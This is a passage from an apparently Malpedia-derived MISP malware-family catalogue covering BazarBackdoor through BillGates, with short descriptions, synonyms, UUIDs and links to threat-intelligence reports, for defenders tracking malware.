- https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489 - webarchive
- https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle - webarchive
- https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html - webarchive
- https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif - webarchive
- https://www.mandiant.com/resources/seo-poisoning-batloader-atera - webarchive
- https://intel471.com/blog/malvertising-surges-to-distribute-malware - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader - webarchive
- https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a - webarchive
- https://www.esentire.com/blog/batloader-continues-signed-msix-app-package-abuse - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BazarBackdoor
BazarBackdoor is a small backdoor, probably by a TrickBot "spin-off" like Anchor. It is called the team9 backdoor (and the corresponding loader the team9 restart loader).
For now, it exclusively uses Emercoin domains (.bazar), hence the name. FireEye uses KEGTAP as the name for BazarLoader and BEERBOT for BazarBackdoor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BazarBackdoor.
Known Synonyms |
---|
BEERBOT |
KEGTAP |
Team9Backdoor |
bazaloader |
bazarloader |
Internal MISP references
UUID 3b1a6ba7-9617-4413-a4ad-66f5d9870bb7
which can be used as unique global reference for BazarBackdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor - webarchive
- https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/ - webarchive
- https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://isc.sans.edu/diary/27308 - webarchive
- https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - webarchive
- https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/ - webarchive
- https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ - webarchive
- https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ - webarchive
- https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ - webarchive
- https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/ - webarchive
- https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware - webarchive
- https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html - webarchive
- https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/ - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html - webarchive
- https://fr3d.hk/blog/campo-loader-simple-but-effective - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ - webarchive
- https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/ - webarchive
- https://thedfirreport.com/2021/12/13/diavol-ransomware/ - webarchive
- https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/ - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/ - webarchive
- https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/ - webarchive
- https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/ - webarchive
- https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/ - webarchive
- https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware - webarchive
- https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors - webarchive
- https://intel471.com/blog/conti-leaks-ransomware-development - webarchive
- https://unit42.paloaltonetworks.com/api-hammering-malware-families/ - webarchive
- https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20 - webarchive
- https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - webarchive
- https://twitter.com/Unit42_Intel/status/1458113934024757256 - webarchive
- https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/ - webarchive
- https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/ - webarchive
- https://twitter.com/anthomsec/status/1321865315513520128 - webarchive
- https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware - webarchive
- https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.youtube.com/watch?v=pIXl79IPkLI - webarchive
- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf - webarchive
- https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ - webarchive
- https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor - webarchive
- https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/ - webarchive
- https://forensicitguy.github.io/bazariso-analysis-advpack/ - webarchive
- https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html - webarchive
- https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth - webarchive
- https://johannesbader.ch/blog/yet-another-bazarloader-dga/ - webarchive
- https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors - webarchive
- https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9 - webarchive
- https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/ - webarchive
- https://cofense.com/blog/bazarbackdoor-stealthy-infiltration - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/ - webarchive
- https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident - webarchive
- https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html - webarchive
- https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue - webarchive
- https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ - webarchive
- https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/ - webarchive
- https://abnormalsecurity.com/blog/bazarloader-contact-form - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.hhs.gov/sites/default/files/bazarloader.pdf - webarchive
- https://malwarebookreports.com/a-look-back-at-bazarloaders-dga/ - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://thedfirreport.com/2021/01/31/bazar-no-ryuk/ - webarchive
- https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/ - webarchive
- https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/ - webarchive
- https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html - webarchive
- https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/ - webarchive
- https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html - webarchive
- https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets - webarchive
- https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/ - webarchive
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - webarchive
- https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/ - webarchive
- https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - webarchive
- https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/ - webarchive
- https://malwarebookreports.com/bazarloader-back-from-holiday-break/ - webarchive
- https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/ - webarchive
- https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/ - webarchive
- https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/ - webarchive
- https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_SummitJohnHammond_Huntress_Analyzing_Ryuk.pdf - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/ - webarchive
- https://unit42.paloaltonetworks.com/ryuk-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader - webarchive
- https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day - webarchive
- https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903 - webarchive
- https://thedfirreport.com/2020/10/08/ryuks-return/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html - webarchive
- https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html - webarchive
- https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv - webarchive
- https://unit42.paloaltonetworks.com/bazarloader-malware/ - webarchive
- https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
- https://www.youtube.com/watch?v=uAkeXCYcl4Y - webarchive
- https://www.scythe.io/library/threatthursday-ryuk - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BazarNimrod
A rewrite of Bazarloader in the Nim programming language.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BazarNimrod.
Known Synonyms |
---|
NimzaLoader |
Internal MISP references
UUID 1735a331-9ca9-49b6-a5aa-0ddac9db8de6
which can be used as unique global reference for BazarNimrod
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176 - webarchive
- https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware - webarchive
- https://twitter.com/James_inthe_box/status/1357009652857196546 - webarchive
- https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BBSRAT
Internal MISP references
UUID cad1d6db-3a6c-4d67-8f6e-627d8a168d6a
which can be used as unique global reference for BBSRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/ - webarchive
- https://www.youtube.com/watch?v=uakw2HMGZ-I - webarchive
- https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb - webarchive
- https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf - webarchive
- https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BBtok
360 Security Center describes BBtok as a banking trojan targeting Mexico.
Internal MISP references
UUID 0b114f49-8c4d-425d-8426-a0c4ab145f36
which can be used as unique global reference for BBtok
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok - webarchive
- https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/ - webarchive
- https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/ - webarchive
- https://www.gdatasoftware.com/blog/2024/09/38039-bbtok-deobfuscating-net-loader - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Beapy
According to Symantec, Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.
Internal MISP references
UUID 404e8121-bced-4320-a984-2b490fad90f8
which can be used as unique global reference for Beapy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BEATDROP
According to Mandiant, BEATDROP is a downloader written in C that uses Atlassian's project management service Trello for C&C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process. Upon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread; the thread points to NtCreateFile. The sample changes execution to the shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.
Internal MISP references
UUID d2fd10ba-5904-4679-8758-509b72b1aa2c
which can be used as unique global reference for BEATDROP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop - webarchive
- https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745 - webarchive
- https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58 - webarchive
- https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bedep
Bedep has been mostly observed in ad-fraud campaigns, although it can also generally load modules for different tasks. It was dropped by the Angler Exploit Kit.
Internal MISP references
UUID af338ac2-8103-4419-8393-fb4f3b43af4b
which can be used as unique global reference for Bedep
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep - webarchive
- https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html - webarchive
- http://malware-traffic-analysis.net/2016/05/09/index.html - webarchive
- https://blog.talosintelligence.com/bedep-actor/ - webarchive
- https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/ - webarchive
- https://www.zscaler.com/blogs/security-research/malvertising-leading-flash-zero-day-angler-exploit-kit - webarchive
- https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bee
Malware family observed in conjunction with PlugX infrastructure in 2013.
Internal MISP references
UUID 2d4aacb7-392a-46fd-b93d-33fcdaeb348f
which can be used as unique global reference for Bee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
beendoor
BEENDOOR is an XMPP-based trojan. It is capable of taking screenshots of the victim's desktop.
Internal MISP references
UUID e2dca2b5-7ca0-4654-ae3d-91dab60dfd90
which can be used as unique global reference for beendoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BeepService
Internal MISP references
UUID 1732faab-2cf9-4d79-a085-6331da008047
which can be used as unique global reference for BeepService
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BellaCiao
Internal MISP references
UUID 4677e4e1-a5aa-405b-9140-523282740d3f
which can be used as unique global reference for BellaCiao
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Belonard
Once set up on the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer becomes infected with Trojan.Belonard.
Internal MISP references
UUID 40c48c99-7d33-4f35-92f1-937c3686afa7
which can be used as unique global reference for Belonard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Berbew
Internal MISP references
UUID 8572e47c-292d-452a-b124-4e3932113c11
which can be used as unique global reference for Berbew
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Berbomthum
Internal MISP references
UUID 6944cbe7-db95-422d-8751-98c9fc4f0b12
which can be used as unique global reference for Berbomthum
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BernhardPOS
Internal MISP references
UUID e59d1d3a-6c23-4684-8be1-2f182f63ab41
which can be used as unique global reference for BernhardPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BestKorea
Internal MISP references
UUID 33308a2c-b1ef-4cbb-9240-25cb6dce55a9
which can be used as unique global reference for BestKorea
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BetaBot
Cybereason concludes that Betabot is a sophisticated infostealer malware that’s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim’s machine and steal sensitive information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BetaBot.
Known Synonyms |
---|
Neurevt |
Internal MISP references
UUID 837c5618-69dc-4817-8672-b3d7ae644f5c
which can be used as unique global reference for BetaBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot - webarchive
- https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/ - webarchive
- https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39 - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://www.cybereason.com/blog/betabot-banking-trojan-neurevt - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en - webarchive
- https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728 - webarchive
- https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- http://www.xylibox.com/2015/04/betabot-retrospective.html - webarchive
- http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bezigate
Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.
The Trojan may perform the following actions:
- List, move, and delete drives
- List, move, and delete files
- List processes and running window titles
- List services
- List registry values
- Kill processes
- Maximize, minimize, and close windows
- Upload and download files
- Execute shell commands
- Uninstall itself
Internal MISP references
UUID 29f45180-cb57-4655-8812-eb814c2a0b0e
which can be used as unique global reference for Bezigate
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BfBot
Internal MISP references
UUID 95b454f6-8ffb-4ef7-8a91-14d48601a899
which can be used as unique global reference for BfBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BHunt
BHunt collects the crypto wallets of its victims. The malware consists of several functions/modules, e.g. a reporting module that reports the presence of crypto wallets on the target computers to the C2 server. It searches for many different cryptocurrencies (e.g. Atomic, Bitcoin, Electrum, Ethereum, Exodus, Jaxx and Litecoin). The Blackjack module is used to steal wallets, Sweet_Bonanza steals victims' browser passwords. There are also modules like the Golden7 or the Chaos_crew module.
Internal MISP references
UUID ae3fe9fa-0717-413e-94fe-6e7b607e45c6
which can be used as unique global reference for BHunt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/ - webarchive
- https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BianLian (Windows)
BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization’s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file.
Internal MISP references
UUID fcc016ad-41a0-4bda-ad88-9542b5f560d9
which can be used as unique global reference for BianLian (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian - webarchive
- https://twitter.com/malwrhunterteam/status/1558548947584548865 - webarchive
- https://censys.com/a-beginners-guide-to-tracking-malware-infrastructure/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye - webarchive
- https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/ - webarchive
- https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://www.youtube.com/live/O2Wx7mQHR2I?si=uydJupvHK6sxxw3n - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://embeeresearch.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://embee-research.ghost.io/building-advanced-censys-queries-utilising-regex-bianlian/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BI_D Ransomware
Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence is achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows system processes, and deletes shadow copies.
Internal MISP references
UUID 9f80bebb-dc5d-4cc1-b2dc-16bca1bbfaad
which can be used as unique global reference for BI_D Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
bifrose
Internal MISP references
UUID 47e654af-8b94-4b97-a2ea-6a28c1bc8099
which can be used as unique global reference for bifrose
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bifrose - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/ - webarchive
- https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BillGates
BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.
BillGates is available for *nix-based systems as well as for Windows.
On Windows, the (Bill)Gates installer typically contains the various modules as linked resources.
Internal MISP references
UUID 42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6
which can be used as unique global reference for BillGates
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates - webarchive
- https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html - webarchive
